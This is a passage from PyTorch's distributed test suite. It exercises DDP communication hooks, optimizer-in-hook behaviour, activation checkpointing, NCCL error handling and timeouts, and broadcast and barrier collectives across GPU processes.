@skip_if_lt_x_gpu(2)
def test_ddp_comm_hook_future_passing_gpu_nccl(self):
"""
This unit test verifies whether the Future object is passed properly using nccl backend.
The hook callback function creates a Future object and sets a value to it.
"""
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
# Get GPU model with simple_hook registered.
gpu_model = self._gpu_model_with_ddp_comm_hook(process_group, self._simple_hook)
# check whether the grads are equal to what simple_hook's then callback returns.
# without the comm_hook, result would be 0.25 * torch.ones(2, 2).
self._run_and_verify_hook(gpu_model, 8, 2 * torch.ones(2, 2))
def _test_ddp_comm_hook_allreduce_hook_nccl(
self, gradient_as_bucket_view=False, static_graph=False
):
"""
This unit test verifies whether a DDP communication hook that just calls
allreduce gives the same result with the case of no hook registered.
Without the then callback, the future_value in reducer is no longer
a PyObject, and this unit test verifies future_value is properly checked.
"""
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
def allreduce_hook(
state: object, bucket: dist.GradBucket
) -> torch.futures.Future[torch.Tensor]:
tensors = [bucket.buffer() / self.world_size]
return (
process_group.allreduce(tensors)
.get_future()
.then(lambda fut: fut.value()[0])
)
# Get GPU model with allreduce_hook registered.
gpu_model = self._gpu_model_with_ddp_comm_hook(
process_group, allreduce_hook, gradient_as_bucket_view, static_graph
)
# check whether the grads are equal to what DDP without hook would return.
self._run_and_verify_hook(gpu_model, 8, 0.25 * torch.ones(2, 2))
def _test_default_ddp_comm_hooks_nccl(self, gradient_as_bucket_view=False):
"""
This unit test verifies whether default Python DDP communication hooks ALLREDUCE, FP16_COMPRESS
and BF16_COMPRESS, can give the same result with the case of no hook registered.
"""
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
# For these default DDP comm hooks, the only state is process group.
state = process_group
hook_options = [default.allreduce_hook, default.fp16_compress_hook]
if (
not TEST_WITH_ROCM
and BFLOAT16_AVAILABLE
and c10d.is_nccl_available()
and torch.cuda.nccl.version() >= (2, 9, 7)
):
hook_options.append(default.bf16_compress_hook)
for hook in hook_options:
# Get GPU model with the hook registered.
# The first arg 'process_group' is used for initializing the test environment,
# so it cannot be replaced by 'state', although they have the same value.
gpu_model = self._gpu_model_with_ddp_comm_hook(
process_group, hook, gradient_as_bucket_view, state
)
# check whether the grads are equal to what DDP without hook would return.
self._run_and_verify_hook(gpu_model, 8, 0.25 * torch.ones(2, 2))
def _test_fp16_compress_wrapper(self, gradient_as_bucket_view=False):
"""
This unit test verifies whether wrapping the ALLREDUCE and POWER_SGD hooks with
the FP16_WRAPPER can give the same result as when there is no hook registered.
"""
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
powerSGD_state = powerSGD.PowerSGDState(process_group=process_group)
hook_args = [
(powerSGD.powerSGD_hook, powerSGD_state),
(default.allreduce_hook, process_group),
]
for hook, state in hook_args:
gpu_model = self._gpu_model_with_ddp_comm_hook(
process_group,
default.fp16_compress_wrapper(hook),
gradient_as_bucket_view,
state,
)
# check whether the grads are equal to what DDP without hook would return.
self._run_and_verify_hook(gpu_model, 8, 0.25 * torch.ones(2, 2))
def _test_bf16_compress_wrapper(self, gradient_as_bucket_view=False):
"""
This unit test verifies whether wrapping the ALLREDUCE and POWER_SGD hooks with
the BF16_WRAPPER can give the same result as when there is no hook registered.
"""
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
powerSGD_state = powerSGD.PowerSGDState(process_group=process_group)
hook_args = [
(powerSGD.powerSGD_hook, powerSGD_state),
(default.allreduce_hook, process_group),
]
for hook, state in hook_args:
gpu_model = self._gpu_model_with_ddp_comm_hook(
process_group,
default.bf16_compress_wrapper(hook),
gradient_as_bucket_view,
state,
)
# check whether the grads are equal to what DDP without hook would return.
self._run_and_verify_hook(gpu_model, 8, 0.25 * torch.ones(2, 2))
def _test_hook_then_optimizer(
self,
functional_optim_cls,
*functional_optim_args,
gradient_as_bucket_view=False,
**functional_optim_kwargs
):
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
hook, hook_state = default.allreduce_hook, process_group
opt_hook_state = default._OptimizerHookState(
functional_optim_cls,
*functional_optim_args,
**functional_optim_kwargs,
)
gpu_model = self._gpu_model_with_ddp_comm_hook(
process_group,
default._hook_then_optimizer(hook, opt_hook_state),
gradient_as_bucket_view,
hook_state,
)
prev_params = copy.deepcopy(list(gpu_model.parameters()))
# Run model with optimizer as part of hook
for _ in range(8):
gpu_model.zero_grad()
self._run_and_verify_hook(gpu_model, 8, 0.25 * torch.ones(2, 2))
new_params = list(gpu_model.parameters())
# Run plain model with allreduce hook and separate optimizer step.
# Verify gradients are the same.
gpu_model_allreduce = self._gpu_model_with_ddp_comm_hook(
process_group, default.allreduce_hook, gradient_as_bucket_view, hook_state
)
mapping = {v: k for k, v in functional_optim_map.items()}
sgd = mapping.get(functional_optim_cls)(
gpu_model_allreduce.parameters(),
*functional_optim_args,
**functional_optim_kwargs,
)
for _ in range(8):
gpu_model_allreduce.zero_grad()
self._run_and_verify_hook(gpu_model_allreduce, 8, 0.25 * torch.ones(2, 2))
sgd.step()
post_opt_params = list(gpu_model_allreduce.parameters())
for opt_as_hook_param, post_opt_param in zip(new_params, post_opt_params):
self.assertEqual(opt_as_hook_param, post_opt_param)
def _test_powerSGD_ddp_comm_hook_nccl(self, gradient_as_bucket_view=False):
"""
This unit test verifies whether Python DDP communication hook POWER_SGD
can give the same result with the case of no hook registered.
"""
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
# Get GPU model with the hook registered.
# Test the hook with different algorithmic configs.
for use_error_feedback, warm_start in product([True, False], [True, False]):
state = powerSGD.PowerSGDState(
process_group=process_group,
matrix_approximation_rank=1,
use_error_feedback=use_error_feedback,
warm_start=warm_start,
)
for hook in [powerSGD.powerSGD_hook, powerSGD.batched_powerSGD_hook]:
gpu_model = self._gpu_model_with_ddp_comm_hook(
process_group, hook, gradient_as_bucket_view, state
)
# check whether the grads are equal to what DDP without hook would return.
self._run_and_verify_hook(gpu_model, 8, 0.25 * torch.ones(2, 2))
def _test_builtin_ddp_comm_hooks_nccl(self, gradient_as_bucket_view=False):
"""
This unit test verifies whether built-in C++ DDP communication hooks ALLREDUCE and FP16_COMPRESS
can give the same result with the case of no hook registered.
"""
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
for comm_hook_type in [
dist.BuiltinCommHookType.ALLREDUCE,
dist.BuiltinCommHookType.FP16_COMPRESS,
]:
# Get GPU model with the built-in communication hook.
gpu_model = self._gpu_model_with_builtin_ddp_comm_hook(
process_group, comm_hook_type, gradient_as_bucket_view
)
# check whether the grads are equal to what DDP without hook would return.
self._run_and_verify_hook(gpu_model, 8, 0.25 * torch.ones(2, 2))
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_ddp_comm_hook_allreduce_hook_nccl(self):
self._test_ddp_comm_hook_allreduce_hook_nccl()
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_default_ddp_comm_hooks_nccl(self):
self._test_default_ddp_comm_hooks_nccl()
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_fp16_compress_wrapper_nccl(self):
self._test_fp16_compress_wrapper()
@requires_nccl()
@requires_nccl_version((2, 9, 7), "Need NCCL 2.9.7+ for BF16_COMPRESS")
@sandcastle_skip_if(
not BFLOAT16_AVAILABLE,
"BFloat16 is only supported by CUDA 11+",
)
@skip_if_lt_x_gpu(2)
@skip_if_rocm
def test_bf16_compress_wrapper_nccl(self):
self._test_bf16_compress_wrapper()
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_hook_then_sgd_nccl(self):
sgd_lr = 1e-2
sgd_momentum = 0.9
sgd_weight_decay = 0.01
self._test_hook_then_optimizer(
_FunctionalSGD,
sgd_lr,
momentum=sgd_momentum,
weight_decay=sgd_weight_decay,
)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_hook_then_sgd_nccl_grad_as_bucket_view(self):
sgd_lr = 1e-2
sgd_momentum = 0.9
sgd_weight_decay = 0.01
self._test_hook_then_optimizer(
_FunctionalSGD,
sgd_lr,
momentum=sgd_momentum,
weight_decay=sgd_weight_decay,
gradient_as_bucket_view=True
)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_hook_then_adamw_nccl(self):
adamw_lr = 1e-2
adamw_betas = (0.9, 0.99)
adamw_eps = 1e-6
self._test_hook_then_optimizer(
_FunctionalAdamW,
adamw_lr,
betas=adamw_betas,
eps=adamw_eps,
gradient_as_bucket_view=True
)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_hook_then_adam_nccl(self):
adam_lr = 1e-2
adam_betas = (0.9, 0.99)
adam_eps = 1e-6
self._test_hook_then_optimizer(
_FunctionalAdam,
adam_lr,
betas=adam_betas,
eps=adam_eps,
gradient_as_bucket_view=True
)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_hook_then_adam_nccl_grad_as_bucket_view(self):
adam_lr = 1e-2
adam_betas = (0.9, 0.99)
adam_eps = 1e-6
self._test_hook_then_optimizer(
_FunctionalAdam,
adam_lr,
betas=adam_betas,
eps=adam_eps,
gradient_as_bucket_view=True
)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_builtin_ddp_comm_hooks_nccl(self):
self._test_builtin_ddp_comm_hooks_nccl()
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_powerSGD_ddp_comm_hook_nccl(self):
self._test_powerSGD_ddp_comm_hook_nccl()
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_ddp_comm_hook_allreduce_hook_nccl_grad_is_view(self):
self._test_ddp_comm_hook_allreduce_hook_nccl(gradient_as_bucket_view=True)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_ddp_comm_hook_allreduce_hook_nccl_static_graph(self):
self._test_ddp_comm_hook_allreduce_hook_nccl(static_graph=True)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_default_ddp_comm_hooks_nccl_is_view(self):
self._test_default_ddp_comm_hooks_nccl(gradient_as_bucket_view=True)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_fp16_compress_wrapper_is_view(self):
self._test_fp16_compress_wrapper(gradient_as_bucket_view=True)
@requires_nccl()
@requires_nccl_version((2, 9, 7), "Need NCCL 2.9.7+ for BF16_COMPRESS")
@sandcastle_skip_if(
not BFLOAT16_AVAILABLE,
"BFloat16 is only supported by CUDA 11+",
)
@skip_if_lt_x_gpu(2)
@skip_if_rocm
def test_bf16_compress_wrapper_is_view(self):
self._test_bf16_compress_wrapper(gradient_as_bucket_view=True)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_builtin_ddp_comm_hooks_nccl_grad_is_view(self):
self._test_builtin_ddp_comm_hooks_nccl(gradient_as_bucket_view=True)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_powerSGD_ddp_comm_hook_nccl_grad_is_view(self):
self._test_powerSGD_ddp_comm_hook_nccl(gradient_as_bucket_view=True)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_ddp_comm_hook_allreduce_with_then_hook_nccl(self):
"""
This unit test verifies whether a DDP communication hook that calls allreduce and then
multiplies the result by ten and divides by two gives the expected result.
"""
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
def allreduce_with_then_hook(
state: object, bucket: dist.GradBucket
) -> torch.futures.Future[torch.Tensor]:
tensors = [bucket.buffer() / self.world_size]
fut = process_group.allreduce(tensors).get_future()
def mult(fut):
# Multiply the result by 10.
return 10 * fut.value()[0]
def div(fut):
# Divide the result by 2.
return 0.5 * fut.value()
return fut.then(mult).then(div)
# Get GPU model with allreduce_with_then_hook registered.
gpu_model = self._gpu_model_with_ddp_comm_hook(
process_group, allreduce_with_then_hook
)
# check whether the grads are equal to what allreduce returns multuplied by 5.
# without the comm_hook, result would be still 0.25 * torch.ones(2, 2).
self._run_and_verify_hook(gpu_model, 8, 1.25 * torch.ones(2, 2))
class AcceptsParam(torch.nn.Module):
def __init__(self, p, factor):
super().__init__()
self.a = p
self.f = factor
def forward(self, input):
return input + self.a * self.f
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_ddp_weight_sharing(self):
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
size = 2048 * 2048
dev = self.rank
world = self.world_size
p = torch.nn.Parameter(torch.randn(size, requires_grad=True))
for try_set_to_none, use_bucket_view in product((False, True), (False, True)):
m = torch.nn.Sequential(
self.AcceptsParam(p, dev + 1), self.AcceptsParam(p, dev + 1)
).cuda(dev)
m = torch.nn.parallel.DistributedDataParallel(
m,
bucket_cap_mb=1,
gradient_as_bucket_view=use_bucket_view,
device_ids=[dev],
process_group=process_group,
)
for i in range(3):
m.zero_grad(set_to_none=try_set_to_none)
m(1).sum().backward()
# Each param value is multiplied by "rank + 1" twice in forward, so the grad
# values produced by a particular rank should be 2. * (rank + 1).
# Summing these over ranks and dividing by world size gives the expected result:
analytic = torch.full_like(
p, 2.0 * (world * (world + 1.0) / 2.0) / world, device=dev
)
for name, p in m.named_parameters():
self.assertEqual(
p.grad,
analytic,
"mismatch at "
+ name
+ ".grad for "
+ "set_to_none = {}, use_bucket_view = {}".format(
try_set_to_none, use_bucket_view
),
)
# A list of tests for ddp with activation checkpointing
# when gradient_as_bucket_view=True, False.
# Most of the tests are referred to
# https://github.com/facebookresearch/fairscale/blob/master/tests/nn/pipe/test_checkpoint_ddp.py
class CheckpointOnceModule(nn.Module):
def __init__(self):
super().__init__()
self.l1 = nn.Linear(20, 20)
self.l2 = nn.Linear(20, 20)
def forward(self, inp):
x = self.l1(inp)
x = checkpoint(self.l2, x)
return x
class CheckpointTwiceModule(CheckpointOnceModule):
def __init__(self):
super().__init__()
def forward(self, inp):
x = self.l1(inp)
x = checkpoint(self.l2, x)
x = checkpoint(self.l2, x)
return x
def _prepare_dummy_data(self):
ddp_bs = 16
bs = ddp_bs * self.world_size
input = torch.rand((bs, 20), device="cuda", requires_grad=True)
target = torch.randn((bs, 20), device="cuda")
offset = self.rank * ddp_bs
ddp_input = input[offset : offset + ddp_bs]
ddp_target = target[offset : offset + ddp_bs]
return input, ddp_input, target, ddp_target
def _train_model(self, model, input_var, target, loss, run_checkpoint=False):
model.train()
if run_checkpoint:
output = checkpoint(model, input_var)
else:
output = model(input_var)
l = loss(output, target)
l.backward()
def _test_ddp_checkpointing(
self,
input_model,
process_group,
use_bucket_view,
find_unused_parameters=False,
static_graph=False,
run_checkpoint=False,
):
# to reprodce the same training results
torch.cuda.set_device(self.rank)
torch.manual_seed(31415)
model = copy.deepcopy(input_model).cuda()
ddp_model = copy.deepcopy(input_model).cuda()
ddp_model = nn.parallel.DistributedDataParallel(
ddp_model,
bucket_cap_mb=1,
gradient_as_bucket_view=use_bucket_view,
device_ids=[self.rank],
process_group=process_group,
find_unused_parameters=find_unused_parameters,
)
if static_graph:
ddp_model._set_static_graph()
self.assertEqual(
ddp_model._get_ddp_logging_data().get("static_graph", 0), static_graph
)
input, ddp_input, target, ddp_target = self._prepare_dummy_data()
loss = nn.MSELoss()
for i in range(5):
model.zero_grad(set_to_none=False)
ddp_model.zero_grad(set_to_none=False)
self._train_model(model, input, target, loss, run_checkpoint=run_checkpoint)
self._train_model(
ddp_model, ddp_input, ddp_target, loss, run_checkpoint=run_checkpoint
)
for i, j in zip(model.parameters(), ddp_model.parameters()):
self.assertTrue(i.grad is not None)
self.assertTrue(j.grad is not None)
self.assertEqual(i.grad, j.grad, rtol=1.3e-06, atol=5e-5)
# DDP works as expect when layer is checkpointed only once
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_ddp_checkpointing_once(self):
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
for use_bucket_view, static_graph in product((False, True), (False, True)):
self._test_ddp_checkpointing(
self.CheckpointOnceModule(),
process_group=process_group,
use_bucket_view=use_bucket_view,
static_graph=static_graph,
)
# DDP will fail when there are unused_parameters in the model
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_ddp_checkpointing_unused_params(self):
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
for use_bucket_view in (True, False):
with self.assertRaisesRegex(
RuntimeError,
"Expected to mark a variable ready only once.",
):
model = self._test_ddp_checkpointing(
self.CheckpointOnceModule(),
process_group=process_group,
use_bucket_view=use_bucket_view,
find_unused_parameters=True,
static_graph=False,
)
# test passes when static_graph is true
model = self._test_ddp_checkpointing(
self.CheckpointOnceModule(),
process_group=process_group,
use_bucket_view=use_bucket_view,
find_unused_parameters=True,
static_graph=True,
)
# DDP will fail when the same layer is checkponted twice
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_ddp_checkpointing_twice(self):
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
for use_bucket_view in (True, False):
with self.assertRaisesRegex(
RuntimeError,
"Expected to mark a variable ready only once.",
):
model = self._test_ddp_checkpointing(
self.CheckpointTwiceModule(),
process_group=process_group,
use_bucket_view=use_bucket_view,
static_graph=False,
)
model = self._test_ddp_checkpointing(
self.CheckpointTwiceModule(),
process_group=process_group,
use_bucket_view=use_bucket_view,
static_graph=True,
)
# DDP works as expected if there is weight sharing among layers
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_ddp_checkpointing_weight_sharing(self):
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
torch.cuda.set_device(self.rank)
for use_bucket_view, static_graph in product((False, True), (False, True)):
torch.manual_seed(31415)
l1 = nn.Linear(20, 20)
l2 = nn.Linear(20, 20)
l1.weight = l2.weight
model = nn.Sequential(l1, l2)
self._test_ddp_checkpointing(
model,
process_group=process_group,
use_bucket_view=use_bucket_view,
static_graph=static_graph,
run_checkpoint=True,
)
class NcclErrorHandlingTest(MultiProcessTestCase):
def setUp(self):
super(NcclErrorHandlingTest, self).setUp()
# Need to skip return code checking for these tests since the child
# processes don't exit cleanly.
self.skip_return_code_checks = [
self.test_nccl_errors_blocking_abort.__wrapped__,
self.test_nccl_errors_blocking_sigkill.__wrapped__,
self.test_nccl_errors_blocking_sigterm.__wrapped__,
self.test_nccl_errors_blocking_nonzero_exit.__wrapped__,
]
# NCCL_BLOCKING_WAIT overrides NCCL_ASYNC_ERROR_HANDLING hence tests
# that use NCCL_BLOCKING_WAIT will test it as expected.
os.environ["NCCL_ASYNC_ERROR_HANDLING"] = "1"
self._spawn_processes()
def tearDown(self):
super(NcclErrorHandlingTest, self).tearDown()
try:
os.remove(self.file_name)
except OSError:
pass
@property
def op_timeout_sec(self):
return 1
@property
def world_size(self):
return 3
@property
def blocking_wait_error_msg(self):
return "Caught collective operation timeout"
def _run_all_reduce(self, pg):
pg.allreduce(torch.rand(10).cuda(self.rank))
@requires_nccl()
@requires_nccl_version((2, 4, 0), "Need NCCL 2.4+ for error checking")
@skip_if_lt_x_gpu(3)
@skip_if_rocm
def test_nccl_errors_nonblocking(self):
# Note: we unset and restore NCCL_ASYNC_ERROR_HANDLING for this test
# since test_c10d_common runs with async error handling by default, but this
# tests behavior when it is not enabled.
prev_nccl_async_error_handling = os.environ.get(
"NCCL_ASYNC_ERROR_HANDLING", None
)
os.environ["NCCL_ASYNC_ERROR_HANDLING"] = "0"
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
process_group.allreduce(torch.rand(10).cuda(self.rank))
if self.rank == 0:
# This allreduce does not block Python thread as allreduce enqueues
# the cuda operation, and then wait only blocks the current cuda
# stream.
work = process_group.allreduce(torch.rand(10).cuda(self.rank))
work.wait()
# Now the work scheduled next should hang forever since the previous
# allreduce will never complete.
t = threading.Thread(target=self._run_all_reduce, args=(process_group,))
t.daemon = True
t.start()
t.join(int(get_timeout(self.id()) / 5))
self.assertTrue(t.is_alive())
if prev_nccl_async_error_handling is not None:
os.environ["NCCL_ASYNC_ERROR_HANDLING"] = prev_nccl_async_error_handling
def _test_nccl_errors_blocking(self, func):
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(
store,
self.rank,
self.world_size,
timeout=timedelta(seconds=self.op_timeout_sec),
)
process_group.allreduce(torch.rand(10).cuda(self.rank))
if self.rank == 0:
work = process_group.allreduce(torch.rand(10).cuda(self.rank))
with self.assertRaisesRegex(RuntimeError, self.blocking_wait_error_msg):
# Operation would time out in blocking mode.
work.wait()
# Run some GPU operations to make sure cuda has not gotten stuck.
# It was observed cuda could get stuck if NCCL communicators were
# not properly aborted before throwing RuntimeError.
a = torch.rand(10).cuda(self.rank)
elif self.rank == 1:
# Clean up structures (ex: files for FileStore before going down)
del process_group
func()
else:
# Wait for timeout
time.sleep(2 * self.op_timeout_sec)
# Now verify communicators on this rank have been aborted by the watchdog thread.
self._wait_for_comm_abort(process_group)
@with_nccl_blocking_wait
@requires_nccl()
@requires_nccl_version((2, 4, 0), "Need NCCL 2.4+ for error checking")
@skip_if_lt_x_gpu(3)
@skip_if_rocm
def test_nccl_errors_blocking_clean_exit(self):
self._test_nccl_errors_blocking(lambda: sys.exit(0))
@with_nccl_blocking_wait
@requires_nccl()
@requires_nccl_version((2, 4, 0), "Need NCCL 2.4+ for error checking")
@skip_if_lt_x_gpu(3)
@skip_if_rocm
def test_nccl_errors_blocking_nonzero_exit(self):
self._test_nccl_errors_blocking(lambda: sys.exit(1))
@with_nccl_blocking_wait
@requires_nccl()
@requires_nccl_version((2, 4, 0), "Need NCCL 2.4+ for error checking")
@skip_if_lt_x_gpu(3)
@skip_if_rocm
@sandcastle_skip(
"Frequently times out see https://github.com/pytorch/pytorch/issues/58920"
)
def test_nccl_errors_blocking_abort(self):
self._test_nccl_errors_blocking(lambda: os.abort())
@with_nccl_blocking_wait
@requires_nccl()
@requires_nccl_version((2, 4, 0), "Need NCCL 2.4+ for error checking")
@skip_if_lt_x_gpu(3)
@skip_if_rocm
def test_nccl_errors_blocking_sigkill(self):
self._test_nccl_errors_blocking(lambda: os.kill(os.getpid(), signal.SIGKILL))
@with_nccl_blocking_wait
@requires_nccl()
@requires_nccl_version((2, 4, 0), "Need NCCL 2.4+ for error checking")
@skip_if_lt_x_gpu(3)
@skip_if_rocm
def test_nccl_errors_blocking_sigterm(self):
self._test_nccl_errors_blocking(lambda: os.kill(os.getpid(), signal.SIGTERM))
@with_nccl_blocking_wait
@requires_nccl()
@requires_nccl_version((2, 4, 0), "Need NCCL 2.4+ for error checking")
@skip_if_lt_x_gpu(3)
def test_nccl_blocking_wait_with_barrier(self):
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(
store,
self.rank,
self.world_size,
timeout=timedelta(seconds=self.op_timeout_sec),
)
process_group.barrier().wait()
if self.rank == 0:
with self.assertRaisesRegex(RuntimeError, self.blocking_wait_error_msg):
# This should timeout
process_group.barrier().wait()
def _run_invalid_nccl_blocking_wait_env(self, val):
os.environ["NCCL_BLOCKING_WAIT"] = val
store = c10d.FileStore(self.file_name, self.world_size)
with self.assertRaises(RuntimeError):
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
@requires_nccl()
@skip_if_lt_x_gpu(3)
def test_invalid_nccl_blocking_wait_env(self):
self._run_invalid_nccl_blocking_wait_env("abc")
self._run_invalid_nccl_blocking_wait_env("-1")
self._run_invalid_nccl_blocking_wait_env("2147483647")
self._run_invalid_nccl_blocking_wait_env("4294967295")
def _wait_for_comm_abort(self, process_group):
"""
Waits for the watchdog thread to abort communicators for the process group.
"""
while True:
try:
process_group.allreduce(torch.rand(10).cuda(self.rank))
except Exception as e:
if "NCCL communicator was aborted" in str(e):
return
else:
raise e
time.sleep(1)
@with_nccl_blocking_wait
@requires_nccl()
@skip_if_lt_x_gpu(3)
def test_nccl_timeout(self):
store = c10d.FileStore(self.file_name, self.world_size)
# Initialize process_group.
timeout = 1
process_group = c10d.ProcessGroupNCCL(
store, self.rank, self.world_size, timeout=timedelta(seconds=timeout)
)
process_group.allreduce(torch.rand(10).cuda(self.rank)).wait()
if self.rank == 0:
# This should timeout in about 1 second.
start = time.time()
# Watchdog may abort timed out work resulting in NCCL error instead of operation timed out.
with self.assertRaisesRegex(RuntimeError, self.blocking_wait_error_msg):
process_group.allreduce(torch.rand(10).cuda(self.rank)).wait()
else:
# Sleep to ensure timeout.
time.sleep(2 * timeout)
self._wait_for_comm_abort(process_group)
class CommTest(test_c10d_common.AbstractCommTest, MultiProcessTestCase):
def setUp(self):
super(CommTest, self).setUp()
# NCCL_BLOCKING_WAIT overrides NCCL_ASYNC_ERROR_HANDLING hence tests
# that use NCCL_BLOCKING_WAIT will test it as expected.
os.environ["NCCL_ASYNC_ERROR_HANDLING"] = "1"
self._spawn_processes()
def tearDown(self):
super(CommTest, self).tearDown()
try:
os.remove(self.file_name)
except OSError:
pass
def _test_broadcast_coalesced(self, process_group, device, root_rank):
half = torch.float16
# No support for float16 for CPU tensors
if device == torch.device("cpu"):
half = torch.float32
target = torch.arange(60, dtype=half, device=device).chunk(5)
target += torch.arange(60, dtype=torch.float32, device=device).chunk(5)
target += torch.arange(60, dtype=half, device=device).chunk(5)
target += torch.arange(60, dtype=torch.float64, device=device).chunk(5)
target += torch.arange(60, dtype=half, device=device).chunk(5)
target += torch.arange(60, dtype=torch.float32, device=device).chunk(5)
# The tensors to pass to broadcast are idential to the target
# only on the process that is the root of the broadcast.
if self.rank == root_rank:
tensors = list(tensor.clone() for tensor in target)
else:
tensors = list(torch.zeros_like(tensor) for tensor in target)
if self.rank != root_rank:
self.assertNotEqual(tensors, target)
c10d._broadcast_coalesced(
process_group, tensors, buffer_size=256, src=root_rank
)
if self.rank != root_rank:
self.assertEqual(tensors, target)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_broadcast_coalesced_nccl(self):
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
device = torch.device("cuda:%d" % self.rank)
ranks = [0, 1]
for root_rank in ranks:
self._test_broadcast_coalesced(process_group, device, root_rank)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_sequence_num_set_default_pg_nccl(self):
torch.cuda.set_device(self.rank)
self._test_sequence_num_set_default_pg(backend="nccl")
@skip_if_lt_x_gpu(2)
@requires_nccl()
def test_sequence_num_incremented_nccl_default(self):
self._test_sequence_num_incremented_default_group("nccl")
@skip_if_lt_x_gpu(4)
@requires_nccl()
def test_sequence_num_incremented_nccl_subgroup(self):
if self.world_size < 4:
return sandcastle_skip("Test requires world_size of at least 4")
self._test_sequence_num_incremented_subgroup("nccl")
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_sequence_num_set_nccl_new_group(self):
torch.cuda.set_device(self.rank)
self._test_sequence_num_set_new_group(backend="nccl")
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_pass_nccl_options_high_priority_stream(self):
pg_opts = c10d.ProcessGroupNCCL.Options()
pg_opts.is_high_priority_stream = True
store = c10d.FileStore(self.file_name, self.world_size)
# Test init_process_group accepts options
dist.init_process_group(
"nccl",
world_size=self.world_size,
rank=self.rank,
store=store,
pg_options=pg_opts,
)
# Test with new_group
pg = c10d.new_group([0, 1], pg_options=pg_opts)
# test if the process group constructed with high priority stream
self.assertTrue(pg.options.is_high_priority_stream)
# test the process group works as expected
t = torch.tensor([self.rank + 1] * 10).cuda(self.rank)
pg.allreduce(t).wait()
expected_tensor = torch.tensor([3] * 10).cuda(self.rank)
self.assertEqual(expected_tensor, t)
@requires_nccl()
@skip_if_lt_x_gpu(4)
def test_nccl_barrier(self):
store = c10d.FileStore(self.file_name, self.world_size)
c10d.init_process_group(
backend="nccl", rank=self.rank, world_size=self.world_size, store=store
)
t = torch.tensor([self.rank + 1] * 10).cuda(2 * self.rank)
c10d.all_reduce(t)
expected_tensor = torch.tensor([3] * 10).cuda(2 * self.rank)
self.assertEqual(expected_tensor, t)
# Test with new_group
pg = c10d.new_group([0, 1])
t = torch.tensor([self.rank + 1] * 10).cuda(2 * self.rank)
pg.allreduce(t).wait()
self.assertEqual(expected_tensor, t)
pg = c10d.new_group([0])
if self.rank == 0:
t = torch.tensor([self.rank + 1] * 10).cuda(2 * self.rank)
expected_tensor = torch.tensor([self.rank + 1] * 10).cuda(2 * self.rank)
pg.allreduce(t).wait()
self.assertEqual(expected_tensor, t)
pg = c10d.new_group([1])
if self.rank == 1:
t = torch.tensor([self.rank + 1] * 10).cuda(2 * self.rank)
expected_tensor = torch.tensor([self.rank + 1] * 10).cuda(2 * self.rank)
pg.allreduce(t).wait()
self.assertEqual(expected_tensor, t)
@requires_nccl()
@skip_if_lt_x_gpu(4)
def test_nccl_barrier_timeout(self):
store = c10d.FileStore(self.file_name, self.world_size)
if self.rank == 0:
with self.assertRaisesRegex(
RuntimeError, "Timed out initializing process group"
):
c10d.init_process_group(
backend="nccl",
rank=self.rank,
world_size=self.world_size,
store=store,
timeout=timedelta(seconds=1),
)
@requires_nccl()
@skip_if_lt_x_gpu(4)
def test_nccl_barrier_timeout_new_group(self):
store = c10d.FileStore(self.file_name, self.world_size)
c10d.init_process_group(
backend="nccl",
rank=self.rank,
world_size=self.world_size,
store=store,
timeout=timedelta(seconds=1),
)
if self.rank == 0:
